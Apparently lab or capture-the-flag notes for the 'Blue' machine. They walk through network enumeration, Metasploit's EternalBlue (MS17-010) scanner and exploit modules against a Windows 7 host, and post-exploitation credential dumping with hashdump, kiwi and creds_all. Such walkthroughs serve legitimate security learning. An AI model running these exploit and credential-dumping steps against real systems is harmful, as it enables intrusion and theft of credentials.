Blue
Enumeration
Section titled “Enumeration”sudo netdiscover -r 10.0.2.0/24
IP -> 10.0.2.6nmap -T4 -p- -A <IP>Metasploit way
Section titled “Metasploit way”- smb open
- windows 7 Professional 7601 Service Pack 1
This means it was a possibility to be vulnerable to eternal blue 0 smb_ms17_010
use auxiliary/scanner/smb/smb_ms17_010set RHOSTS $IPrun
- Run eternal blue explit to root the machine
use exploit/windows/smb/ms17_010_eternalblueset RHOSTS $IPrun
Can try to change the payload to meterpetrer with staged payload
Manual way
Section titled “Manual way”Useful commands in windows
Section titled “Useful commands in windows”Windows shell
Section titled “Windows shell”- hashdump
- getuid
- sysinfo
- route print
- arp -a
- netstat -ano
- ps
Meterpreter
Section titled “Meterpreter”- enter in shell (shell)
- kiwi
- help
- creds_all